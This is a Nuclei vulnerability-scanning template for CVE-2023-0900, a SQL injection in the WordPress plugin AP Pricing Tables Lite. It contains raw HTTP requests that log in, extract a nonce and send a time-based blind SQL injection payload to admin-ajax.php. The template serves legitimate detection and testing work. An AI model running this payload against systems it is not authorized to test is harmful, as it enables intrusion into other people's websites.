id: CVE-2023-0900 info: name: AP Pricing Tables Lite <= 1.1.6 - SQL Injection author: r3Y3r53 severity: high description: | The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as admins. reference: - https://wpscan.com/vulnerability/f601e637-a486-4f3a-9077-4f294ace7ea1 - https://github.com/WPPlugins/ap-pricing-tables-lite - https://nvd.nist.gov/vuln/detail/CVE-2023-0900 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2023-0900 cwe-id: CWE-89 epss-score: 0.00974 epss-percentile: 0.8166 cpe: cpe:2.3:a:wpdevart:pricing_table_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 3 vendor: wpdevart product: pricing_table_builder framework: wordpress publicwww-query: "wp-content/plugins/ap-pricing-tables-lite" tags: cve,cve2023,sqli,wordpress,wp-plugin,wp,authenticated,wpscan,ap-pricing-tables-lite http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - | GET /wp-admin/admin.php?page=ap-pricing-tables-lite&message=1 HTTP/1.1 Host: {{Hostname}} - | @timeout: 20s POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded action=backend_ajax&_action=copy_table&table_id=1+AND+(SELECT+2035+FROM+(SELECT(SLEEP(10)))A)&_wpnonce={{nonce}} matchers: - type: dsl dsl: - 'duration_3>=5' - 'status_code_3 == 200' - 'contains(body_3, "Security check")' - 'contains(body_2, "ap-pricing-tables-lite")' condition: and extractors: - type: regex name: nonce part: body group: 1 regex: - '_wpnonce=([0-9a-z]+)">Log Out' internal: true # digest: 490a0046304402205238360a44c438bd8c1d22a95e634093194dc1ba93ffa65c525527e3239f1f7302207f4ca82cb2fe3b7332dd1b5a9bcef65d7869979dabf07d572419a500d7571875:922c64590222798bb761d5b6d8e72950